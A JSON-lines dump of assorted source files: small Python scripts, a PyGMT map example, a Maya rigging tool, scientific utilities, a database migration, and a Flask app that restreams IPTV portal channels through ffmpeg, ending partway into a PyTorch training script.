+{"seq_id":"198872690","text":"def init(list):\n list = []\n\n\ndef lookup(list):\n for i in list:\n print(\"%s/%s/%s\" % (i['year'], i['month'], i['day']))\n\ndef store(list):\n a = {}\n a['year'], a['month'], a['day'] = input('请输入年月日(yy/mm/dd)').split('/')\n list.append(a)\n\nprompt = '''\n1.Init\n2.Lookup\n3.Store\n输入quit结束程序!\n'''\nlist = []\nmessage = ''\nwhile message != 'quit':\n message = input(prompt)\n if message == '1':\n init(list)\n elif message == '2':\n lookup(list)\n elif message == '3':\n store(list)\n\n","sub_path":"exp3/exp3_3.py","file_name":"exp3_3.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"329655516","text":"\"\"\"\nCylindrical equidistant\n=======================\n\n``Qwidth``: Give the figure ``width``.\n\"\"\"\nimport pygmt\n\nfig = pygmt.Figure()\n# Use region \"d\" to specify global region (-180/180/-90/90)\nfig.coast(\n region=\"d\",\n projection=\"Q12c\",\n land=\"tan4\",\n water=\"lightcyan\",\n frame=\"afg\",\n)\nfig.show()\n","sub_path":"examples/projections/cyl/cyl_equidistant.py","file_name":"cyl_equidistant.py","file_ext":"py","file_size_in_byte":311,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"255720464","text":"#----------------------------------------------#\n# coding: utf-8\n#Author: rosa.w\n#Mail: wrx1844@qq.com\n#Computer language: Python.3.2.2\n#scriptName : rosa_PublicClass.py\n#Note: this is my global class\n# add in git 2014/04/02\n#----------------------------------------------#\n\n\nimport maya.cmds as mc\nimport sys\nimport maya.mel as mel\n#scriptPath = mc.internalVar(userScriptDir=True)\n#addPath = scriptPath[ : ( len(scriptPath)-1 ) ]\n#sys.path.append(addPath)\n\n\nclass DynCrv():\n\n\n def dynamicToolWin(self):\n\n dynamicToolWindow = 'RoolWin'\n if mc.window(dynamicToolWindow,ex = True):\n mc.deleteUI(dynamicToolWindow)\n\n mc.window(dynamicToolWindow,widthHeight=(300, 100),t='Dyn Curve v1.0',menuBar = True,rtf=True,s=True)\n frame1 = mc.frameLayout( label='Dynamic Curve', labelAlign='top', borderStyle='in' )\n mc.rowColumnLayout('Main',numberOfColumns=1,w=300,cal = (5,'center'),m=True)\n\n mc.rowColumnLayout('dynamicCv_ly',numberOfColumns=2,w=300,cal = (5,'center'),m=True)\n mc.textField('dynamicCurve_TF',w=150)\n mc.button(l='load Dynamic Ctrl',w=150,c=lambda *args:self.loadCtrl())\n mc.setParent('..')\n mc.button('dynamic Curve',w=300,h=30,c=lambda *args:self.DynamicAddCurve())\n\n mc.showWindow()\n\n def loadCtrl(self):\n objsel=mc.ls(sl=True)[0]\n dynCtrl = mc.textField('dynamicCurve_TF',e=True,tx=objsel)\n\n\n def DynamicAddCurve(self):\n dynCtrl=mc.textField('dynamicCurve_TF',q=True,tx=True)\n curveAll=mc.ls(sl=True)\n for i in curveAll:\n mc.select(i)\n dynamicCurve=str(i)+'_dynamic_curve'\n dynamicFollicle=str(i)+'_dynamic_follicle'\n\n\n mel.eval('makeCurvesDynamicHairs 1 0 1')\n ### rename\n follicle=mc.listRelatives(i,p=True)[0]\n mc.rename(follicle,dynamicFollicle)\n\n\n follicleGrpOrg=mc.listRelatives(dynamicFollicle,p=True)[0]\n follicleGrp=str(i)+'_'+str(follicleGrpOrg)\n mc.rename(follicleGrpOrg,follicleGrp)\n\n follicleShape=mc.listRelatives(dynamicFollicle,s=True)[0]\n dynamicCurveOrg=mc.listConnections(follicleShape+'.outCurve',d=True)[0]\n mc.rename(dynamicCurveOrg,dynamicCurve)\n\n outCurveGrpOrg=mc.listRelatives(dynamicCurve,p=True)[0]\n outCurveGrp=str(i)+'_'+str(outCurveGrpOrg)\n mc.rename(outCurveGrpOrg,outCurveGrp)\n\n ######\n hairSysOrg=mc.listConnections(str(follicleShape)+'.outHair',s=True)[0]\n hairSys=str(i)+'_hairSystem'\n mc.rename(hairSysOrg,hairSys)\n hairSysShape=mc.listRelatives(hairSys,s=True)[0]\n\n\n dynfolliShape=mc.listRelatives(dynamicFollicle,s=True)[0]\n mc.setAttr(str(dynfolliShape)+'.pointLock',1)\n\n if mc.attributeQuery('dynamic',node=dynCtrl,ex=True)==False:\n mc.addAttr(dynCtrl,longName='dynamic',at =\"enum\",en =\"off:on:\",k=True)\n else:\n pass\n if mc.attributeQuery('Swing_strength_Driven',node=dynCtrl,ex=True)==False:\n mc.addAttr(dynCtrl,longName='Swing_strength_Driven',at='float',min=0,max=1)\n else:\n pass\n\n if mc.attributeQuery('Swing_strength',node=dynCtrl,ex=True)==False:\n mc.addAttr(dynCtrl,longName='Swing_strength',at='float',min=0,max=1,dv=0.8)\n else:\n pass\n if mc.attributeQuery('dynamic_baseVaule',node=dynCtrl,ex=True)==False:\n mc.addAttr(dynCtrl,longName='dynamic_baseVaule',at='float',min=-1,max=1)\n else:\n pass\n if mc.attributeQuery('start_frame',node=dynCtrl,ex=True)==False:\n mc.addAttr(dynCtrl,longName='start_frame',at='float',dv=1)\n else:\n pass\n\n\n mc.setAttr(str(dynCtrl)+'.dynamic',k=True)\n mc.setAttr(str(dynCtrl)+'.Swing_strength_Driven',k=True)\n mc.setAttr(str(dynCtrl)+'.Swing_strength',k=True)\n mc.setAttr(str(dynCtrl)+'.dynamic_baseVaule',k=True)\n mc.setAttr(str(dynCtrl)+'.start_frame',k=True)\n mc.setDrivenKeyframe(str(hairSysShape)+'.simulationMethod', cd=str(dynCtrl)+'.dynamic',dv=0,v=1)\n mc.setDrivenKeyframe(str(hairSysShape)+'.simulationMethod', cd=str(dynCtrl)+'.dynamic',dv=1,v=3)\n ## tomorrow connect attribute\n mc.setAttr(str(follicleShape)+'.overrideDynamics',1)\n mc.setAttr(str(follicleShape)+'.stiffnessScale[1].stiffnessScale_FloatValue',1)\n mc.connectAttr(str(dynCtrl)+'.Swing_strength_Driven',str(follicleShape)+'.stiffness')\n mc.connectAttr(str(dynCtrl)+'.Swing_strength_Driven',str(follicleShape)+'.startCurveAttract')\n\n mc.setDrivenKeyframe(str(dynCtrl)+'.Swing_strength_Driven', cd=str(dynCtrl)+'.Swing_strength',dv=0,v=0.1,ott='linear',itt='linear')\n mc.setDrivenKeyframe(str(dynCtrl)+'.Swing_strength_Driven', cd=str(dynCtrl)+'.Swing_strength',dv=1,v=1,ott='linear',itt='linear')\n ####\n conNode=str(i)+'_condition'\n pma01=str(i)+'_01_PMA'\n pma02=str(i)+'_02_PMA'\n mc.createNode('condition',n=conNode)\n mc.createNode('plusMinusAverage',n=pma01)\n mc.createNode('plusMinusAverage',n=pma02)\n\n mc.connectAttr(str(dynCtrl)+'.Swing_strength_Driven',str(conNode)+'.firstTerm')\n mc.connectAttr(str(dynCtrl)+'.Swing_strength_Driven',str(conNode)+'.colorIfTrueR')\n mc.setAttr(str(conNode)+'.operation',2)\n mc.setAttr(str(conNode)+'.secondTerm',0.8)\n mc.setAttr(str(conNode)+'.colorIfFalseR',0.8)\n\n mc.connectAttr(str(conNode)+'.outColorR',str(pma01)+'.input2D[0].input2Dx')\n mc.setAttr(str(pma01)+'.input2D[1].input2Dx',0.8)\n mc.setAttr(str(pma01)+'.operation',2)\n\n mc.connectAttr(str(pma01)+'.output2Dx',str(pma02)+'.input2D[0].input2Dx')\n mc.connectAttr(str(dynCtrl)+'.dynamic_baseVaule',str(pma02)+'.input2D[1].input2Dx')\n mc.setAttr(str(pma02)+'.operation',1)\n\n mc.connectAttr(str(pma02)+'.output2Dx',str(follicleShape)+'.attractionScale[1].attractionScale_FloatValue')\n mc.setDrivenKeyframe(str(dynCtrl)+'.dynamic_baseVaule', cd=str(dynCtrl)+'.Swing_strength_Driven',dv=0.8,v=0.2,ott='linear',itt='linear')\n mc.setDrivenKeyframe(str(dynCtrl)+'.dynamic_baseVaule', cd=str(dynCtrl)+'.Swing_strength_Driven',dv=1,v=0.8,ott='linear',itt='linear')\n\n mc.connectAttr(str(dynCtrl)+'.start_frame',str(hairSysShape)+'.startFrame')\n\n mc.setAttr(str(dynCtrl)+'.dynamic_baseVaule',k=False)\n mc.setAttr(str(dynCtrl)+'.Swing_strength_Driven',k=False)\n print(hairSys)\n print(follicleGrp)\n print(outCurveGrp)\n\n grpAll=str(i)+'_dynamic_grp'\n mc.group(follicleGrp,outCurveGrp,hairSys,n=grpAll)\n\n\n","sub_path":"rosa_Checker/RosaCmds/Tools/rosa_DynamicTool.py","file_name":"rosa_DynamicTool.py","file_ext":"py","file_size_in_byte":6970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"131580502","text":"\"\"\"Additional functions used within the CARSpy program.\"\"\"\nfrom functools import wraps\nimport pickle\nimport numpy as np\n\ntry:\n import cantera as ct\n _HAS_CANTERA = True\nexcept Exception:\n _HAS_CANTERA = False\n\n\ndef _ensureCantera(function):\n if _HAS_CANTERA:\n @wraps(function)\n def wrapper(*args, **kwargs):\n return function(*args, **kwargs)\n wrapper.__doc__ = function.__doc__\n return wrapper\n\n def no_op(*args, **kwargs):\n _message = (\"cantera module is required for calculating equilibrium \"\n \"composition. Please install cantera first or specify \"\n \"custom eq_func in signal_as() instead.\")\n raise Exception(_message)\n no_op.__doc__ = function.__doc__\n return no_op\n\n\n@_ensureCantera\ndef eq_comp(temperature, pressure, init_comp, valid_from=1200.):\n \"\"\"\n Calculate equilibrium composition at given temperature and pressure.\n\n .. attention::\n This function is only intended as a \"dummy\" template for setting up\n custom equilibrium solvers with ``cantera``. Please be aware of the\n applicabilities and uncertainties of various kinetic mechanisms.\n\n Parameters\n ----------\n temperature : float\n Temperature in [K].\n pressure : 1, float, optional\n Pressure in bars.\n init_comp : dict\n Initial gas mole fractions in a dictionary.\n valid_from : float\n Temperature lower boundary for when the mechanism is valid, default is\n 1200 [K]. This value is by no means valid for all cases.\n \"\"\"\n products = init_comp.copy()\n if temperature > 1200:\n gas = ct.Solution('gri30.xml')\n gas.TPX = temperature, pressure*1e5, init_comp\n gas.equilibrate('TP')\n products = gas.mole_fraction_dict()\n\n # remove small values\n products = {key: products[key] for key in products if products[key] > 1e-5}\n\n return products\n\n\ndef downsample(w, w_fine, spec_fine, mode='local_mean'):\n \"\"\"Downsample a fine spectrum according to specified coarse spectral axis.\n\n Parameters\n ----------\n w : sorted 1-D array of floats\n Coarse spectral axis (must be sorted and evenly spaced).\n w_fine : sorted 1-D array of floats\n Fine spectral axis (must be sorted and evenly spaced).\n spec_fine : 1-D array of floats\n Spectrum with fine resolution, must be of the same size as w_fine.\n mode : str, optional\n Two modes to choose from: 'local-mean' or 'interp', by default\n 'local_mean'.\n\n Returns\n -------\n 1-D array of floats\n Downsampled spectrum of the same size as w.\n \"\"\"\n downsampled = []\n if mode == 'interp':\n downsampled = np.interp(w, w_fine, spec_fine)\n elif mode == 'local_mean':\n # downsample scale\n hw = int((w[1] - w[0])/(w_fine[1] - w_fine[0])/2)\n # search for closest indices\n w_fine = np.array(w_fine)\n idx = np.searchsorted(w_fine, w)\n idx[w_fine[idx] - w > np.diff(w_fine).mean()*0.5] -= 1\n # take local average based on the downsample scale\n downsampled = np.mean(\n [spec_fine[idx-_step] for _step in range(-hw, hw+1)], axis=0)\n\n return downsampled\n\n\ndef comp_normalize(comp_dict, target=1.0):\n \"\"\"Normalize gas composition saved in a dictionary.\n\n Parameters\n ----------\n comp_dict : dict\n Gas composition in the measurement volume stored in a dictionary.\n target : float, optional\n Normalization factor, by default 1.0.\n\n Returns\n -------\n dict\n Normalized gas composition stored in a dictionary.\n \"\"\"\n raw = sum(comp_dict.values())\n factor = target/raw\n return {key: value*factor for key, value in comp_dict.items()}\n\n\ndef pkl_dump(path_write, data):\n \"\"\"Dump data into a pickle file.\n\n Parameters\n ----------\n path_write : path\n Absolute path to the pickle file to be created.\n data: python object\n \"\"\"\n with open(path_write, 'wb') as pf:\n pickle.dump(data, pf)\n\n\ndef pkl_load(path_load):\n \"\"\"Load a data into from pickle file.\n\n Parameters\n ----------\n dir_save : path\n Absolute path to the pickle file to be loaded.\n \"\"\"\n with open(path_load, 'rb') as pf:\n data = pickle.load(pf)\n\n return data\n","sub_path":"carspy/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"400316821","text":"#!/usr/bin/python\nimport os, sys\nimport errno\nfrom shutil import copyfile\nimport numpy as np\nimport math # for use of math.pi\n\n### Define a modified folder \n### creator which doesn't throw an error if the fodler already exists.\n### uses errno and os\n### https://stackoverflow.com/questions/600268/mkdir-p-functionality-in-python \ndef mkdir_p(path):\n try:\n os.makedirs(path)\n except OSError as exc: # Python >2.5\n if exc.errno == errno.EEXIST and os.path.isdir(path):\n pass\n else:\n raise\n\ndef main():\n\tn_cases=20\n\tcase_folder_names=[]\n\tcase_file_names=[]\n\tfor case in range(1, n_cases+1):\n\t\tcase_folder_name=\"case_\"+str(case)\n\t\tcase_folder_names=case_folder_names+[case_folder_name]\n\t\tcase_file_name='hm50_finite_case_'+str(case)\n\t\tcase_file_names=case_file_names+[case_file_name]\n\tprint(case_folder_names)\n\tprint(case_file_names)\n\n\t#Define the location of the originial files\n\told_files_location='/global/scratch/lpgregg/burnup_safety/michael_rerun'\n\n\t#Define the location for the perturbed temperature files\n\tnew_files_location='/global/scratch/lpgregg/burnup_safety/michael_rerun_results'\n\n\t#copy over all the input files.\n\tresults_filename=\"hm50_finite_input_res.m\"\n\tdepletion_filename=\"hm50_finite_input_dep.m\"\n\n\tfor i in range(0,len(case_folder_names)):\n\t\tmkdir_p(new_files_location);\n\t\tmkdir_p(new_files_location+\"/\"+case_folder_names[i])\n\t\tcase_folder_names[i]\n\t\t\n\t\told_file_path=old_files_location+\"/\"+case_folder_names[i]+\"/\"+results_filename\n\t\tnew_file_path=new_files_location+\"/\"+case_folder_names[i]+\"/\"+results_filename\n\t\tprint(old_file_path)\n\t\tprint(new_file_path)\n\n\t\tcopyfile(old_file_path,\n\t\t\tnew_file_path)\n\n\t\told_file_path=old_files_location+\"/\"+case_folder_names[i]+\"/\"+depletion_filename\n\t\tnew_file_path=new_files_location+\"/\"+case_folder_names[i]+\"/\"+depletion_filename\n\t\tprint(old_file_path)\n\t\tprint(new_file_path)\n\n\t\tcopyfile(old_file_path,\n\t\t\tnew_file_path)\t\t\n\n\nmain()\n","sub_path":"move_michael_results.py","file_name":"move_michael_results.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"38959289","text":"# 61. KVSの検索\n# 60で構築したデータベースを用い,特定の(指定された)アーティストの活動場所を取得せよ.\n\n\"\"\"\n普通にコマンドラインからredisに接続して確かめられた.\n\n127.0.0.1:6379> get \"Al Street\"\n\"United States\"\n\nけど多分Pythonでやれってことだと思うのでPythonでやります\n\"\"\"\n\nimport redis\n\nif __name__ == '__main__':\n my_redis = redis.Redis(host='localhost', port=6379, db=0)\n\n if my_redis.get(\"Al Street\"):\n print(my_redis.get(\"Al Street\").decode(\"utf-8\"))\n\n\"\"\"\n出力\n\ndecodeしないなら\nb'United States'\n\ndecodeするなら\nUnited States\n\"\"\"","sub_path":"60-69/knock_61.py","file_name":"knock_61.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"21216562","text":"from opengever.core.upgrade import SchemaMigration\nfrom sqlalchemy import String\n\n\nclass IncreaseOGDSColumnLengths(SchemaMigration):\n \"\"\"Increase lengths for several VARCHAR columns in OGDS in preparation\n for factoring out common column lengths to constants.\n\n (Upgrade-step for corresponding change in opengever.ogds.models)\n \"\"\"\n\n profileid = 'opengever.ogds.base'\n upgradeid = 4301\n\n def migrate(self):\n self.increase_admin_unit_title_length()\n self.increase_org_unit_title_length()\n\n self.increase_user_firstname_length()\n self.increase_user_lastname_length()\n\n self.increase_user_directorate_length()\n self.increase_user_directorate_abbr_length()\n self.increase_user_department_length()\n self.increase_user_department_abbr_length()\n\n self.increase_user_email_length()\n self.increase_user_email2_length()\n\n def increase_admin_unit_title_length(self):\n # Match UNIT_TITLE_LENGTH\n self.op.alter_column('admin_units',\n 'title',\n type_=String(255),\n existing_nullable=True,\n existing_type=String(30))\n\n def increase_org_unit_title_length(self):\n # Match UNIT_TITLE_LENGTH\n self.op.alter_column('org_units',\n 'title',\n type_=String(255),\n existing_nullable=True,\n existing_type=String(30))\n\n def increase_user_firstname_length(self):\n # Match FIRSTNAME_LENGTH\n self.op.alter_column('users',\n 'firstname',\n type_=String(255),\n existing_nullable=True,\n existing_type=String(50))\n\n def increase_user_lastname_length(self):\n # Match LASTNAME_LENGTH\n self.op.alter_column('users',\n 'lastname',\n type_=String(255),\n existing_nullable=True,\n existing_type=String(50))\n\n def increase_user_directorate_length(self):\n self.op.alter_column('users',\n 'directorate',\n type_=String(255),\n existing_nullable=True,\n existing_type=String(50))\n\n def increase_user_directorate_abbr_length(self):\n self.op.alter_column('users',\n 'directorate_abbr',\n type_=String(50),\n existing_nullable=True,\n existing_type=String(10))\n\n def increase_user_department_length(self):\n self.op.alter_column('users',\n 'department',\n type_=String(255),\n existing_nullable=True,\n existing_type=String(50))\n\n def increase_user_department_abbr_length(self):\n self.op.alter_column('users',\n 'department_abbr',\n type_=String(50),\n existing_nullable=True,\n existing_type=String(10))\n\n def increase_user_email_length(self):\n # Match EMAIL_LENGTH\n self.op.alter_column('users',\n 'email',\n type_=String(255),\n existing_nullable=True,\n existing_type=String(50))\n\n def increase_user_email2_length(self):\n # Match EMAIL_LENGTH\n self.op.alter_column('users',\n 'email2',\n type_=String(255),\n existing_nullable=True,\n existing_type=String(50))\n","sub_path":"opengever/ogds/base/upgrades/to4301.py","file_name":"to4301.py","file_ext":"py","file_size_in_byte":3940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"54427802","text":"import stb\nfrom flask import Flask, render_template, redirect, request, Response\nfrom pathlib import Path\nimport os\nimport sys\nimport json\nfrom urllib import parse\nimport subprocess\n\n\napp = Flask(__name__)\nbasePath = Path(__file__).resolve().parent\n\n\nif os.getenv(\"HOST\"):\n host = os.getenv(\"HOST\")\nelse:\n host = \"localhost:8001\"\n\nif os.getenv(\"CONFIG\"):\n config_file = os.getenv(\"CONFIG\")\nelse:\n config_file = str(basePath) + \"/config.json\"\n\n\ndef getPortals():\n try:\n with open(config_file) as f:\n data = json.load(f)\n portals = data[\"portals\"]\n except:\n print(\"Creating config file\")\n data = {}\n data[\"portals\"] = []\n portals = []\n savePortals(portals)\n return portals\n\n\ndef savePortals(portals):\n with open(config_file, \"w\") as f:\n data = {}\n data[\"portals\"] = portals\n json.dump(data, f, indent=4)\n\n\n@app.route(\"/\", methods=[\"GET\"])\ndef home():\n return redirect(\"/portals\", code=302)\n\n\n@app.route(\"/portals\", methods=[\"GET\"])\ndef portals():\n names = []\n masterBlacklist = \"^((?=[a-zA-Z0-9_-]+).)*$\"\n blacklists = []\n portals = getPortals()\n if portals and len(portals) > 0:\n for i in portals:\n names.append(i[\"name\"])\n # ^((?!^word1$|^word2$)(?=[a-zA-Z0-9_-]+).)*$\n masterBlacklist = \"^((?!^\" + (\"$|^\".join(names)) + \"$)(?=[a-zA-Z0-9_-]+).)*$\"\n for i in portals:\n inames = names.copy()\n iname = i[\"name\"]\n inames.remove(iname)\n blacklist = \"^((?!^\" + (\"$|^\".join(inames)) + \"$)(?=[a-zA-Z0-9_-]+).)*$\"\n blacklists.append(blacklist)\n return render_template(\n \"portals.html\",\n portals=portals,\n masterBlacklist=masterBlacklist,\n blacklists=blacklists,\n )\n\n\n@app.route(\"/portal/add\", methods=[\"POST\"])\ndef portalsAdd():\n name = request.form[\"name\"]\n url = stb.getUrl(request.form[\"url\"])\n mac = request.form[\"mac\"]\n proxy = request.form[\"proxy\"]\n format = request.form[\"format\"]\n try:\n portals = getPortals()\n token = stb.getToken(url, mac)\n expiry = stb.getExpires(url, mac, token)\n portals.append(\n {\n \"name\": name,\n \"url\": url,\n \"mac\": mac,\n \"proxy\": proxy,\n \"format\": format,\n \"expires\": expiry,\n \"enabled channels\": [],\n \"custom channel names\": {},\n \"custom genres\": {},\n }\n )\n savePortals(portals)\n except:\n print(sys.exc_info()[1])\n pass\n return redirect(\"/portals\", code=302)\n\n\n@app.route(\"/portal/update\", methods=[\"POST\"])\ndef portalUpdate():\n name = request.form[\"name\"]\n oname = request.form[\"oname\"]\n url = stb.getUrl(request.form[\"url\"])\n mac = request.form[\"mac\"]\n proxy = request.form[\"proxy\"]\n format = request.form[\"format\"]\n try:\n portals = getPortals()\n token = stb.getToken(url, mac)\n expiry = stb.getExpires(url, mac, token)\n for i in range(len(portals)):\n if portals[i][\"name\"] == oname:\n portals[i][\"name\"] = name\n portals[i][\"url\"] = url\n portals[i][\"mac\"] = mac\n portals[i][\"proxy\"] = proxy\n portals[i][\"format\"] = format\n portals[i][\"expires\"] = expiry\n savePortals(portals)\n break\n except:\n print(sys.exc_info()[1])\n pass\n return redirect(\"/portals\", code=302)\n\n\n@app.route(\"/portal/remove\", methods=[\"POST\"])\ndef portalRemove():\n name = request.form[\"name\"]\n portals = getPortals()\n for i in range(len(portals)):\n if portals[i][\"name\"] == name:\n portals.pop(i)\n break\n savePortals(portals)\n return redirect(\"/portals\", code=302)\n\n\n@app.route(\"/editor\", methods=[\"GET\"])\ndef editor():\n channels = []\n portals = getPortals()\n if len(portals) > 0:\n for p in portals:\n portalName = p[\"name\"]\n url = p[\"url\"]\n mac = p[\"mac\"]\n enabledChannels = p[\"enabled channels\"]\n customChannelNames = p[\"custom channel names\"]\n customGenres = p[\"custom genres\"]\n try:\n token = stb.getToken(url, mac)\n allChannels = stb.getAllChannels(url, mac, token)\n genres = stb.getGenres(url, mac, token)\n for i in allChannels:\n channelId = i[\"id\"]\n channelName = i[\"name\"]\n genre = genres.get(i[\"tv_genre_id\"])\n if channelId in enabledChannels:\n enabled = True\n else:\n enabled = False\n customChannelName = customChannelNames.get(channelId)\n if customChannelName == None:\n customChannelName = \"\"\n customGenre = customGenres.get(channelId)\n if customGenre == None:\n customGenre = \"\"\n channels.append(\n {\n \"enabled\": enabled,\n \"channelName\": channelName,\n \"customChannelName\": customChannelName,\n \"genre\": genre,\n \"customGenre\": customGenre,\n \"channelId\": channelId,\n \"portalName\": portalName,\n }\n )\n except:\n print(sys.exc_info()[1])\n pass\n return render_template(\"editor.html\", channels=channels)\n\n\n@app.route(\"/editor/save\", methods=[\"POST\"])\ndef editorSave():\n enabledEdits = json.loads(request.form[\"enabledEdits\"])\n nameEdits = json.loads(request.form[\"nameEdits\"])\n genreEdits = json.loads(request.form[\"genreEdits\"])\n portals = getPortals()\n for e in enabledEdits:\n portal = e[\"portal\"]\n chid = e[\"channel id\"]\n enabled = e[\"enabled\"]\n for i, p in enumerate(portals):\n if p[\"name\"] == portal:\n enabledChannels = p[\"enabled channels\"]\n if enabled:\n enabledChannels.append(chid)\n else:\n enabledChannels.remove(chid)\n enabledChannels = list(set(enabledChannels))\n portals[i][\"enabled channels\"] = enabledChannels\n break\n for n in nameEdits:\n portal = n[\"portal\"]\n chid = n[\"channel id\"]\n customName = n[\"custom name\"]\n for i, p in enumerate(portals):\n if p[\"name\"] == portal:\n customChannelNames = p[\"custom channel names\"]\n if customName:\n customChannelNames.update({chid: customName})\n else:\n customChannelNames.pop(chid)\n portals[i][\"custom channel names\"] = customChannelNames\n break\n for g in genreEdits:\n portal = g[\"portal\"]\n chid = g[\"channel id\"]\n customGenre = g[\"custom genre\"]\n for i, p in enumerate(portals):\n if p[\"name\"] == portal:\n customGenres = p[\"custom genres\"]\n if customGenre:\n customGenres.update({chid: customGenre})\n else:\n customGenres.pop(chid)\n portals[i][\"custom genres\"] = customGenres\n break\n savePortals(portals)\n return redirect(\"/editor\", code=302)\n\n\n@app.route(\"/player\", methods=[\"GET\"])\ndef player():\n channels = []\n for p in getPortals():\n portalName = p[\"name\"]\n url = p[\"url\"]\n mac = p[\"mac\"]\n proxy = p[\"proxy\"]\n enabledChannels = p[\"enabled channels\"]\n customChannelNames = p[\"custom channel names\"]\n customGenres = p[\"custom genres\"]\n if len(enabledChannels) != 0:\n try:\n token = stb.getToken(url, mac)\n allChannels = stb.getAllChannels(url, mac, token)\n genres = stb.getGenres(url, mac, token)\n for i in allChannels:\n channelId = i[\"id\"]\n if channelId in enabledChannels:\n cmd = i[\"cmd\"]\n channelName = customChannelNames.get(channelId)\n if channelName == None:\n channelName = i[\"name\"]\n genre = customGenres.get(channelId)\n if genre == None:\n genre = genres.get(i[\"tv_genre_id\"])\n epg = stb.getShortEpg(channelId, url, mac, token)\n try:\n now = epg[0][\"name\"]\n except:\n now = \"No data\"\n try:\n nex = epg[1][\"name\"]\n except:\n nex = \"No data\"\n query = parse.urlencode(\n {\n \"portalName\": portalName,\n \"url\": url,\n \"mac\": mac,\n \"cmd\": cmd,\n \"proxy\": proxy,\n \"format\": \"mp4\",\n }\n )\n link = \"http://\" + host + \"/play?\" + query\n channels.append(\n {\n \"name\": channelName,\n \"genre\": genre,\n \"link\": link,\n \"now\": now,\n \"next\": nex,\n }\n )\n channels.sort(key=lambda k: k[\"name\"])\n except:\n print(sys.exc_info()[1])\n pass\n return render_template(\"player.html\", channels=channels)\n\n\n@app.route(\"/playlist\", methods=[\"GET\"])\ndef playlist():\n channels = []\n for p in getPortals():\n portalName = p[\"name\"]\n url = p[\"url\"]\n mac = p[\"mac\"]\n proxy = p[\"proxy\"]\n format = p[\"format\"]\n enabledChannels = p[\"enabled channels\"]\n customChannelNames = p[\"custom channel names\"]\n customGenres = p[\"custom genres\"]\n if len(enabledChannels) != 0:\n try:\n token = stb.getToken(url, mac)\n allChannels = stb.getAllChannels(url, mac, token)\n genres = stb.getGenres(url, mac, token)\n for i in allChannels:\n channelId = i[\"id\"]\n if channelId in enabledChannels:\n cmd = i[\"cmd\"]\n channelName = customChannelNames.get(channelId)\n if channelName == None:\n channelName = i[\"name\"]\n genre = customGenres.get(channelId)\n if genre == None:\n genre = genres.get(i[\"tv_genre_id\"])\n query = parse.urlencode(\n {\n \"portalName\": portalName,\n \"url\": url,\n \"mac\": mac,\n \"cmd\": cmd,\n \"proxy\": proxy,\n \"format\": format,\n }\n )\n channels.append(\n '#EXTINF:-1 group-title=\"'\n + genre\n + '\",'\n + channelName\n + \"\\n\"\n + \"http://\"\n + host\n + \"/play?\"\n + query\n )\n except:\n print(sys.exc_info()[1])\n pass\n channels.sort(key=lambda k: k.split(\",\")[1])\n playlist = \"#EXTM3U \\n\"\n playlist = playlist + \"\\n\".join(channels)\n return Response(playlist, mimetype=\"text/plain\")\n\n\n@app.route(\"/play\", methods=[\"GET\"])\ndef channel():\n def streamData(link, proxy, format):\n if format == \"mp4\":\n ffmpegcmd = [\n \"ffmpeg\",\n \"-re\",\n \"-loglevel\",\n \"panic\",\n \"-hide_banner\",\n \"-i\",\n link,\n \"-vcodec\",\n \"copy\",\n \"-f\",\n \"mp4\",\n \"-movflags\",\n \"frag_keyframe+empty_moov\",\n \"pipe:\",\n ]\n elif format == \"mpegts\":\n ffmpegcmd = [\n \"ffmpeg\",\n \"-re\",\n \"-loglevel\",\n \"panic\",\n \"-hide_banner\",\n \"-i\",\n link,\n \"-c\",\n \"copy\",\n \"-f\",\n \"mpegts\",\n \"pipe:\",\n ]\n elif format == \"hls\":\n ffmpegcmd = [\n \"ffmpeg\",\n \"-re\",\n \"-loglevel\",\n \"panic\",\n \"-hide_banner\",\n \"-i\",\n link,\n \"-c\",\n \"copy\",\n \"-f\",\n \"hls\",\n \"pipe:\",\n ]\n\n if proxy:\n ffmpegcmd.insert(5, \"-http_proxy\")\n ffmpegcmd.insert(6, proxy)\n\n try:\n ffmpeg_sb = subprocess.Popen(\n ffmpegcmd, stdin=subprocess.DEVNULL, stdout=subprocess.PIPE\n )\n for stdout_line in iter(ffmpeg_sb.stdout.readline, \"\"):\n yield stdout_line\n finally:\n ffmpeg_sb.terminate()\n\n url = request.args.get(\"url\")\n mac = request.args.get(\"mac\")\n cmd = request.args.get(\"cmd\")\n proxy = request.args.get(\"proxy\")\n format = request.args.get(\"format\")\n if format == \"redirect\":\n try:\n token = stb.getToken(url, mac)\n if \"http://localhost/\" in cmd: \n link = stb.getLink(url, mac, token, cmd)\n else:\n link = cmd.split(\" \")[1]\n return redirect(link, code=302)\n except:\n print(sys.exc_info()[1])\n pass\n else:\n try:\n token = stb.getToken(url, mac)\n if \"http://localhost/\" in cmd: \n link = stb.getLink(url, mac, token, cmd)\n else:\n link = cmd.split(\" \")[1]\n return Response(streamData(link, proxy, format))\n except:\n print(sys.exc_info()[1])\n pass\n\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\", port=8001, debug=True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":15042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"17039060","text":"import numpy as np\nimport pickle\nimport os\nfrom PIL import Image\nimport time\nfrom tqdm import tqdm\nimport shutil\nfrom random import randint\nimport argparse\n\nimport torchvision.transforms as transforms\nimport torchvision.models as models\nimport torch.nn as nn\nimport torch\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\nfrom torch.optim.lr_scheduler import ReduceLROnPlateau\n\nfrom dataloader import spatial_dataloader\nfrom utils import *\nfrom network import *\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"0\"\n\n# 添加命令行指令\nparser = 